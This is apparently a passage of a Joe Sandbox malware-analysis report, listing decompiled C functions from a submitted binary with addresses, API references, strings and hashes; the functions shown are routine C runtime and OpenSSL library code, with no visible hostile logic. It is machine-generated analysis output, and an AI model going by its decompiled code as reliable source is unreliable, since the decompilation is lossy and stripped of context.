						_t143 =  *_t200;
						__eflags = _t143;
						if(_t143 != 0) {
							_a8 = _t200 - _t214;
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L75;
								}
								E00456F70(_t250, _t221, _t182, _t233, _t143);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_v16 = _t214;
								_t143 =  *((intOrPtr*)(_a8 + _t214));
								__eflags = _t143;
								if(_t143 != 0) {
									continue;
								}
								goto L75;
							}
						}
						L75:
						__eflags = _a16;
						if(_a16 < 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L78;
								}
								_t143 = E00456F70(_t250, _t221, _t182, _t233, 0x20);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_t124 =  &_a16;
								 *_t124 = _a16 + 1;
								__eflags =  *_t124;
								_v16 = _t214;
								if( *_t124 < 0) {
									continue;
								}
								goto L78;
							}
						}
						L78:
						return _t143;
					} else {
						goto L18;
					}
				} else {
					_t220 = 0x19;
					_a16 = 0x19;
					L18:
					_t184 = _a100;
					_t217 = _t232;
					 *((char*)(_t253 + _t220 + 0x30)) = 0;
					_t208 = _t184 - _t220;
					_t235 = _t217 + 1;
					do {
						_t154 =  *_t217;
						_t217 = _t217 + 1;
					} while (_t154 != 0);
					_t218 = _t217 - _t235;
					_t156 =  >=  ? _t184 : _t220;
					_t237 = _a96 - ( >=  ? _t184 : _t220);
					_t268 = _a12;
					_t238 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0);
					_t209 =  <  ? 0 : _t208;
					_t239 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_a24 = _t209;
					_t240 =  <  ? 0 : _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_t160 = _a104;
					_a96 = _t240;
					if((_t160 & 0x00000010) != 0) {
						_t246 =  >=  ? _t209 : _t240;
						_a24 =  >=  ? _t209 : _t240;
						_t240 = 0;
						_a96 = 0;
					}
					if((_t160 & 0x00000001) != 0) {
						_t240 =  ~_t240;
						_a96 = _t240;
					}
					_t64 =  &_a28; // 0x456c55
					_t185 =  *_t64;
					if(_t240 > 0) {
						_t226 = _a8;
						do {
							E00456F70(_t249, _t185, _t226, _v0, 0x20);
							_t240 = _t240 - 1;
							_t253 = _t253 + 0x14;
						} while (_t240 > 0);
						_t220 = _a16;
						_a96 = _t240;
					}
					_t161 = _a12;
					if(_a12 != 0) {
						E00456F70(_t249, _t185, _a8, _v0, _t161);
						_t253 = _t253 + 0x14;
					}
					_t163 =  *_a4;
					if( *_a4 != 0) {
						_t245 = _a8;
						_t225 = _v0;
						do {
							E00456F70(_t249, _t185, _t245, _t225, _t163);
							_t253 = _t253 + 0x14;
							_t174 = _a4 + 1;
							_a4 = _t174;
							_t163 =  *_t174;
						} while ( *_t174 != 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_a24 > 0) {
						_t244 = _a8;
						_t224 = _v0;
						do {
							E00456F70(_t249, _t185, _t244, _t224, 0x30);
							_t253 = _t253 + 0x14;
							_t170 = _a24 - 1;
							_a24 = _t170;
						} while (_t170 > 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_t220 > 0) {
						_t243 = _a8;
						do {
							_t166 =  *((char*)(_t253 + _t220 + 0x2f));
							_t220 = _t220 - 1;
							E00456F70(_t249, _t185, _t243, _v0, _t166);
							_t253 = _t253 + 0x14;
						} while (_t220 > 0);
						_t240 = _a96;
					}
					if(_t240 < 0) {
						_t242 =  ~_t240;
						do {
							E00456F70(_t249, _t185, _a8, _v0, 0x20);
							_t253 = _t253 + 0x14;
							_t242 = _t242 - 1;
						} while (_t242 != 0);
					}
					_pop(_t223);
					_pop(_t241);
					_pop(_t186);
					return E0042A77E(_t186, _a60 ^ _t253, _t218, _t223, _t241);
				}
			}

0x004573f5
0x004573fa
0x00457401
0x0045740b
0x00457410
0x00457415
0x00457419
0x00457422
0x00457430
0x00457434
0x00457438
0x0045743e
0x00457442
0x00457445
0x00457449
0x0045744d
0x00457454
0x00457456
0x00457458
0x00457470
0x00457473
0x0045747f
0x00457482
0x0045748a
0x0045748f
0x00457475
0x00457475
0x00457475
0x00457460
0x00457460
0x00457462
0x0045746a
0x0045746c
0x0045746c
0x00457458
0x00457493
0x0045749a
0x0045749f
0x004574ac
0x004574b6
0x004574b9
0x004574bd
0x004574a1
0x004574a6
0x004574a6
0x0045749f
0x004574c4
0x004574d3
0x004574db
0x004574dd
0x004574e2
0x004574e4
0x004574e9
0x004574ee
0x004574f2
0x004574f7
0x004574fd
0x004574fe
0x00457500
0x00000000
0x00000000
0x00457502
0x00457509
0x00000000
0x00000000
0x00000000
0x00457509
0x0045750b
0x0045750f
0x00457516
0x00457523
0x0045769f
0x004576a4
0x004576a5
0x004576a6
0x004576a7
0x004576a8
0x004576a9
0x004576aa
0x004576ab
0x004576ac
0x004576ad
0x004576ae
0x004576af
0x004576b5
0x004576ba
0x004576be
0x004576c0
0x004576c2
0x004576ca
0x004576cd
0x004576cf
0x004576d3
0x004576d5
0x004576d7
0x004576d7
0x004576d8
0x004576d8
0x004576d7
0x004576e5
0x004576e8
0x004576ed
0x004576f1
0x004576f3
0x004576f5
0x004576f5
0x004576f9
0x004576fa
0x004576fe
0x004576ff
0x00457703
0x00457704
0x00457708
0x00457709
0x0045770d
0x0045770f
0x00457715
0x00457715
0x00457719
0x00000000
0x00000000
0x0045771f
0x00457721
0x00457725
0x00457727
0x00457730
0x00457730
0x00457733
0x00457772
0x00457772
0x00457786
0x0045778b
0x0045778e
0x00457735
0x00457735
0x00457738
0x0045773a
0x0045773a
0x00457751
0x00457753
0x00457756
0x00457758
0x0045775a
0x00457761
0x00457766
0x00457766
0x00457769
0x00457769
0x00457792
0x00457792
0x00457796
0x00457796
0x00457727
0x0045779a
0x0045779c
0x0045779e
0x004577a0
0x004577a3
0x004577a5
0x004577af
0x004577a7
0x004577a7
0x004577a7
0x004577b3
0x004577b3
0x004577b3
0x004577b9
0x004577ba
0x004577bb
0x004577bf
0x004577c3
0x004577c5
0x00000000
0x00000000
0x00000000
0x004577c5
0x00457715
0x004577cb
0x004577cb
0x004577cf
0x004577d1
0x004577d3
0x004577d7
0x004577e0
0x004577e0
0x004577e4
0x00000000
0x00000000
0x004577ee
0x004577f7
0x004577fe
0x004577ff
0x00457803
0x00457806
0x00457808
0x00000000
0x00000000
0x00000000
0x00457808
0x004577e0
0x0045780a
0x0045780a
0x0045780f
0x00457811
0x00457811
0x00457815
0x00000000
0x00000000
0x0045781d
0x00457826
0x00457829
0x0045782a
0x0045782a
0x0045782a
0x0045782e
0x00457832
0x00000000
0x00000000
0x00000000
0x00457832
0x00457811
0x00457834
0x00457839
0x00000000
0x00000000
0x00000000
0x00457518
0x00457518
0x0045751d
0x00457529
0x00457529
0x0045752d
0x00457531
0x00457536
0x00457538
0x00457540
0x00457540
0x00457542
0x00457543
0x00457547
0x00457551
0x00457554
0x00457558
0x0045755f
0x00457565
0x00457568
0x0045756a
0x0045756e
0x00457571
0x00457575
0x0045757b
0x0045757f
0x00457582
0x00457586
0x00457588
0x00457588
0x0045758e
0x00457590
0x00457592
0x00457592
0x00457596
0x00457596
0x0045759c
0x0045759e
0x004575a2
0x004575ab
0x004575b0
0x004575b1
0x004575b4
0x004575b8
0x004575bc
0x004575bc
0x004575c0
0x004575c6
0x004575d3
0x004575d8
0x004575d8
0x004575df
0x004575e3
0x004575e5
0x004575e9
0x004575f0
0x004575f8
0x00457601
0x00457604
0x00457605
0x00457609
0x0045760b
0x0045760f
0x00457613
0x00457613
0x0045761c
0x0045761e
0x00457622
0x00457626
0x0045762c
0x00457635
0x00457638
0x00457639
0x0045763d
0x00457641
0x00457645
0x00457645
0x0045764b
0x0045764d
0x00457651
0x00457651
0x00457656
0x0045765f
0x00457664
0x00457667
0x0045766b
0x0045766b
0x00457671
0x00457673
0x00457675
0x00457681
0x00457686
0x00457689
0x00457689
0x00457675
0x00457690
0x00457691
0x00457693
0x0045769e
0x0045769e

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F
0123456789abcdef, xrefs: 004574C4
, xrefs: 00457482
+, xrefs: 00457475
0123456789ABCDEF, xrefs: 004574D6

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

Uniqueness

Uniqueness Score: -1.00%

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50
timewindowsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411B10() {
				intOrPtr _v8;
				struct tagMSG _v36;
				long _t9;
				long _t11;
				intOrPtr _t19;

				_t1 = timeGetTime() + 0x1388; // 0x1388
				_t19 = _t1;
				_v8 = _t19;
				_t9 = timeGetTime();
				if(_t19 > _t9) {
					do {
						_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
						if(_t11 == 0) {
							goto L5;
						}
						while(_v36.message != 0x12) {
							DispatchMessageW( &_v36);
							_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
							if(_t11 != 0) {
								continue;
							}
							goto L5;
						}
						break;
						L5:
						Sleep(0x64);
						_t11 = timeGetTime();
					} while (_v8 > _t11);
					return _t11;
				}
				return _t9;
			}

0x00411b20
0x00411b20
0x00411b26
0x00411b29
0x00411b2d
0x00411b40
0x00411b4c
0x00411b50
0x00000000
0x00000000
0x00411b52
0x00411b5c
0x00411b6a
0x00411b6e
0x00000000
0x00000000
0x00000000
0x00411b6e
0x00000000
0x00411b70
0x00411b72
0x00411b78
0x00411b7a
0x00000000
0x00411b7f
0x00411b85

APIs

timeGetTime.WINMM ref: 00411B1E
timeGetTime.WINMM ref: 00411B29
PeekMessageW.USER32 ref: 00411B4C
DispatchMessageW.USER32 ref: 00411B5C
PeekMessageW.USER32 ref: 00411B6A
Sleep.KERNEL32(00000064), ref: 00411B72
timeGetTime.WINMM ref: 00411B78

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004416EB Relevance: 9.1, APIs: 6, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004416EB(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v32;
				signed int _t16;
				intOrPtr _t17;
				signed int _t19;
				signed int _t20;
				signed int _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				signed int* _t40;
				void* _t48;
				signed int _t50;
				signed int _t54;
				signed int _t57;
				intOrPtr _t58;
				intOrPtr _t59;

				_t48 = __edx;
				_t40 = _a4;
				_t65 = _t40;
				if(_t40 != 0) {
					 *_t40 =  *_t40 & 0x00000000;
					_t54 = _a12;
					_t50 = _a8;
					__eflags = _t50;
					if(_t50 == 0) {
						__eflags = _t54;
						if(__eflags == 0) {
							goto L4;
						} else {
							goto L13;
						}
					} else {
						__eflags = _t54;
						if(__eflags == 0) {
							L13:
							_t35 = E00425208(__eflags);
							_t58 = 0x16;
							 *_t35 = _t58;
							E004242D2();
							_t17 = _t58;
							goto L10;
						} else {
							L4:
							__eflags = _t50;
							if(_t50 != 0) {
								 *_t50 = 0;
							}
							_t16 = E00441667(_a16);
							_a4 = _t16;
							__eflags = _t16;
							if(_t16 == 0) {
								L15:
								_t17 = 0;
								goto L10;
							} else {
								_t19 = E0042C160(_t16) + 1;
								 *_t40 = _t19;
								__eflags = _t54;
								if(_t54 == 0) {
									goto L15;
								} else {
									__eflags = _t19 - _t54;
									if(_t19 <= _t54) {
										_t20 = E0042C0FD(_t50, _t54, _a4);
										__eflags = _t20;
										if(_t20 != 0) {
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											E004242FD(_t40, _t48);
											asm("int3");
											_push(0xc);
											_push(0x508078);
											E00428520(_t40, _t50, _t54);
											_v32 = _v32 & 0x00000000;
											_t56 = _a4;
											__eflags = _a4;
											__eflags = 0 | _a4 != 0x00000000;
											if(__eflags != 0) {
												__eflags = E00448FF4(_t56, 0x7fff) - 0x7fff;
												asm("sbb eax, eax");
												if(__eflags == 0) {
													goto L17;
												} else {
													E00428AF7(7);
													_t12 =  &_v8;
													 *_t12 = _v8 & 0x00000000;
													__eflags =  *_t12;
													_t57 = E00441667(_t56);
													_v32 = _t57;
													_v8 = 0xfffffffe;
													E004417FD();
													_t30 = _t57;
												}
											} else {
												L17:
												 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
												E004242D2();
												_t30 = 0;
											}
											return E00428565(_t30);
										} else {
											goto L15;
										}
									} else {
										_t17 = 0x22;
										L10:
										goto L11;
									}
								}
							}
						}
					}
				} else {
					_t37 = E00425208(_t65);
					_t59 = 0x16;
					 *_t37 = _t59;
					E004242D2();
					_t17 = _t59;
					L11:
					return _t17;
				}
			}

0x004416eb
0x004416ef
0x004416f3
0x004416f5
0x0044170a
0x0044170d
0x00441711
0x00441714
0x00441716
0x0044174d
0x0044174f
0x00000000
0x00000000
0x00000000
0x00000000
0x00441718
0x00441718
0x0044171a
0x00441751
0x00441751
0x00441758
0x00441759
0x0044175b
0x00441760
0x00000000
0x0044171c
0x0044171c
0x0044171c
0x0044171e
0x00441720
0x00441720
0x00441726
0x0044172b
0x0044172f
0x00441731
0x00441775
0x00441775
0x00000000
0x00441733
0x00441739
0x0044173a
0x0044173d
0x0044173f
0x00000000
0x00441741
0x00441741
0x00441743
0x00441769
0x00441771
0x00441773
0x0044177b
0x0044177c
0x0044177d
0x0044177e
0x0044177f
0x00441780
0x00441785
0x00441786
0x00441788
0x0044178d
0x00441792
0x00441798
0x0044179b
0x004417a0
0x004417a2
0x004417c6
0x004417c8
0x004417cc
0x00000000
0x004417ce
0x004417d0
0x004417d6
0x004417d6
0x004417d6
0x004417e1
0x004417e3
0x004417e6
0x004417ed
0x004417f2
0x004417f2
0x004417a4
0x004417a4
0x004417a9
0x004417af
0x004417b4
0x004417b4
0x004417f9
0x00000000
0x00000000
0x00000000
0x00441745
0x00441747
0x00441748
0x00000000
0x00441748
0x00441743
0x0044173f
0x00441731
0x0044171a
0x004416f7
0x004416f7
0x004416fe
0x004416ff
0x00441701
0x00441706
0x00441749
0x0044174c
0x0044174c

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
__invoke_watson.LIBCMT ref: 00441780
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Uniqueness

Uniqueness Score: -1.00%

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 29%

			E004506A0(void* __ebp, intOrPtr _a4, signed int _a8, intOrPtr _a12, char _a16, char _a80, char _a144, signed int _a208, unsigned int _a216, intOrPtr* _a220, intOrPtr _a224) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr _t35;
				intOrPtr _t43;
				char* _t46;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr* _t57;
				void* _t65;
				void* _t66;
				intOrPtr* _t67;
				unsigned int _t68;
				void* _t69;
				signed int _t73;
				intOrPtr _t74;
				signed int _t75;
				void* _t76;
				signed int _t77;

				E0042F7C0(0xd4);
				_t29 =  *0x50ad20; // 0xcafe2c1d
				_a208 = _t29 ^ _t75;
				_t54 = _a224;
				_t68 = _a216;
				_t67 = _a220;
				_t73 = _t68 >> 0x0000000c & 0x00000fff;
				_a8 = _t68 & 0x00000fff;
				_a4 = E00450DF0(_t54, _t65, _t67, _t73, _t68);
				_v0 = E00450870(_t54, _t67, _t73, _t68);
				_t35 = E004513B0(_t54, _t65, _t67, _t73, _t68);
				_t76 = _t75 + 0xc;
				_a12 = _t35;
				if(_a4 == 0) {
					_push(_t68 >> 0x18);
					_push("lib(%lu)");
					_push(0x40);
					_push( &_a144);
					E004567A0(_t68 >> 0x18);
					_t76 = _t76 + 0x10;
				}
				_t81 = _v0;
				if(_v0 == 0) {
					_push(_t73);
					_push("func(%lu)");
					_push(0x40);
					_push( &_a80);
					E004567A0(_t81);
					_t76 = _t76 + 0x10;
				}
				_t74 = _a12;
				_t82 = _t74;
				if(_t74 == 0) {
					_push(_a8);
					_push("reason(%lu)");
					_push(0x40);
					_push( &_a16);
					E004567A0(_t82);
					_t76 = _t76 + 0x10;
				}
				_t55 = _v0;
				_t37 =  !=  ? _t74 :  &_a16;
				_push( !=  ? _t74 :  &_a16);
				_t39 =  !=  ? _t55 :  &_a80;
				_push( !=  ? _t55 :  &_a80);
				_t41 =  !=  ? _a4 :  &_a144;
				E004567A0(_a4, _t67, _t54, "error:%08lX:%s:%s:%s", _t68,  !=  ? _a4 :  &_a144);
				_t57 = _t67;
				_t77 = _t76 + 0x1c;
				_t66 = _t57 + 1;
				do {
					_t43 =  *_t57;
					_t57 = _t57 + 1;
				} while (_t43 != 0);
				if(_t57 - _t66 == _t54 - 1 && _t54 > 4) {
					_t69 = 0;
					_t54 = _t54 + _t67;
					do {
						_t46 = E00431C30(_t67, 0x3a);
						_t77 = _t77 + 8;
						if(_t46 == 0 || _t46 > _t54 - 5 + _t69) {
							_t46 = _t54 - 5 + _t69;
							 *_t46 = 0x3a;
						}
						_t69 = _t69 + 1;
						_t67 = _t46 + 1;
					} while (_t69 < 4);
				}
				return E0042A77E(_t54, _a208 ^ _t77, _t66, _t67, _t68);
			}

0x004506a5
0x004506aa
0x004506b1
0x004506b9
0x004506c2
0x004506cc
0x004506de
0x004506e4
0x004506ee
0x004506f8
0x004506fc
0x00450701
0x00450704
0x0045070d
0x0045071b
0x0045071c
0x00450721
0x00450723
0x00450724
0x00450729
0x00450729
0x0045072c
0x00450731
0x00450733
0x00450734
0x0045073d
0x0045073f
0x00450740
0x00450745
0x00450745
0x00450748
0x0045074c
0x0045074e
0x00450750
0x00450758
0x0045075d
0x0045075f
0x00450760
0x00450765
0x00450765
0x00450768
0x00450772
0x00450777
0x0045077c
0x00450783
0x0045078d
0x00450799
0x0045079e
0x004507a0
0x004507a3
0x004507a6
0x004507a6
0x004507a8
0x004507a9
0x004507b4
0x004507bb
0x004507bd
0x004507c0
0x004507c3
0x004507c8
0x004507cd
0x004507db
0x004507dd
0x004507dd
0x004507e0
0x004507e1
0x004507e4
0x004507c0
0x00450801

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

reason(%lu), xrefs: 00450758
func(%lu), xrefs: 00450734
error:%08lX:%s:%s:%s, xrefs: 00450792
lib(%lu), xrefs: 0045071C

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E0045AE30(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t40;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t51;
				intOrPtr* _t52;
				intOrPtr _t53;

				_t55 = __ebp;
				_t1 =  &_a8; // 0x463967
				_t53 =  *_t1;
				_t2 =  &_a4; // 0x463967
				_t52 =  *_t2;
				_t43 =  *_t52;
				if(_t43 < _t53) {
					__eflags =  *(_t52 + 8) - _t53;
					if( *(_t52 + 8) < _t53) {
						__eflags = _t53 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t44 = _t53 + 3;
							_t50 = 0xaaaaaaab * _t44 >> 0x20;
							_t18 =  *((intOrPtr*)(_t52 + 4));
							_push(__ebx);
							_t40 = 0xaaaaaaab * _t44 >> 0x20 >> 1 << 2;
							__eflags = _t18;
							if(_t18 != 0) {
								_t19 = E00454FB0(_t50, _t18,  *(_t52 + 8), _t40, ".\\crypto\\buffer\\buffer.c", 0xa6);
							} else {
								_t19 = E00454E50(_t40, ".\\crypto\\buffer\\buffer.c", 0xa4);
							}
							_t51 = _t19;
							__eflags = _t51;
							if(__eflags != 0) {
								__eflags = _t53 -  *_t52;
								 *((intOrPtr*)(_t52 + 4)) = _t51;
								 *(_t52 + 8) = _t40;
								E0042B420( *_t52 + _t51, 0, _t53 -  *_t52);
								 *_t52 = _t53;
								return _t53;
							} else {
								E004512D0(_t40, _t51, _t52, _t55, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0xa9);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t52, __ebp, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0x9f);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags =  *((intOrPtr*)(_t52 + 4)) + _t43;
						E0042B420( *((intOrPtr*)(_t52 + 4)) + _t43, 0, _t53 - _t43);
						 *_t52 = _t53;
						return _t53;
					}
				} else {
					E0042B420( *((intOrPtr*)(_t52 + 4)) + _t53, 0, _t43 - _t53);
					 *_t52 = _t53;
					return _t53;
				}
			}

0x0045ae30
0x0045ae31
0x0045ae31
0x0045ae36
0x0045ae36
0x0045ae3a
0x0045ae3e
0x0045ae5a
0x0045ae5d
0x0045ae7b
0x0045ae81
0x0045aea0
0x0045aea8
0x0045aeaa
0x0045aead
0x0045aeb2
0x0045aeb5
0x0045aeb7
0x0045aedd
0x0045aeb9
0x0045aec4
0x0045aec9
0x0045aee5
0x0045aee7
0x0045aee9
0x0045af0f
0x0045af11
0x0045af1a
0x0045af1e
0x0045af26
0x0045af2d
0x0045aeeb
0x0045aefb
0x0045af03
0x0045af0a
0x0045af0a
0x0045ae83
0x0045ae93
0x0045ae9b
0x0045ae9f
0x0045ae9f
0x0045ae5f
0x0045ae67
0x0045ae6c
0x0045ae74
0x0045ae7a
0x0045ae7a
0x0045ae40
0x0045ae4b
0x0045ae53
0x0045ae59
0x0045ae59

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D
.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Uniqueness

Uniqueness Score: -1.00%

Function 00425341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E00425341(void* __ebx, void* __edi, intOrPtr _a4) {
				char* _v24;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				short _v300;
				void* __esi;
				void* _t15;
				void* _t17;
				signed int _t20;
				char* _t22;
				signed int _t30;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t51;
				signed int _t52;

				if(_a4 != 0) {
					_push(__ebx);
					_t30 = E0043749C(_a4, 0x55);
					if(_t30 < 0x55) {
						_push(__edi);
						_t15 = E00428CDE(_t40, 2 + _t30 * 2);
						_t42 = _t15;
						if(_t42 != 0) {
							_t5 = _t30 + 1; // 0x1
							_t17 = E004374F1(_t42, _t5, _a4, _t5);
							_t52 = _t51 + 0x10;
							if(_t17 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E004242FD(_t30, _t40);
								asm("int3");
								_t49 = _t47;
								_push(_t49);
								_t50 = _t52;
								_t20 =  *0x50ad20; // 0xcafe2c1d
								_v40 = _t20 ^ _t52;
								_t22 = _v24;
								_t45 = _v28;
								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
									E00425A97(_t30, _t40, _t45,  &_v300);
								}
								_pop(_t46);
								return E0042A77E(_t30, _v36 ^ _t50, _t40, _t42, _t46);
							} else {
								_t15 = _t42;
								goto L5;
							}
						} else {
							L5:
							goto L6;
						}
					} else {
						_t15 = 0;
						L6:
						return _t15;
					}
				} else {
					return 0;
				}
			}

0x00425348
0x0042534e
0x00425359
0x00425360
0x0042536d
0x0042536f
0x00425374
0x00425379
0x0042537f
0x00425388
0x0042538d
0x00425392
0x0042539a
0x0042539b
0x0042539c
0x0042539d
0x0042539e
0x0042539f
0x004253a4
0x004253a8
0x004255d8
0x004255d9
0x004255e1
0x004255e8
0x004255eb
0x004255ef
0x004255f5
0x00425620
0x00425626
0x00425630
0x00425639
0x00425394
0x00425394
0x00000000
0x00425394
0x0042537b
0x0042537b
0x00000000
0x0042537b
0x00425362
0x00425362
0x0042537c
0x0042537e
0x0042537e
0x0042534a
0x0042534d
0x0042534d

APIs

_wcsnlen.LIBCMT ref: 00425354

Strings

U, xrefs: 0042535D

Memory Dump Source

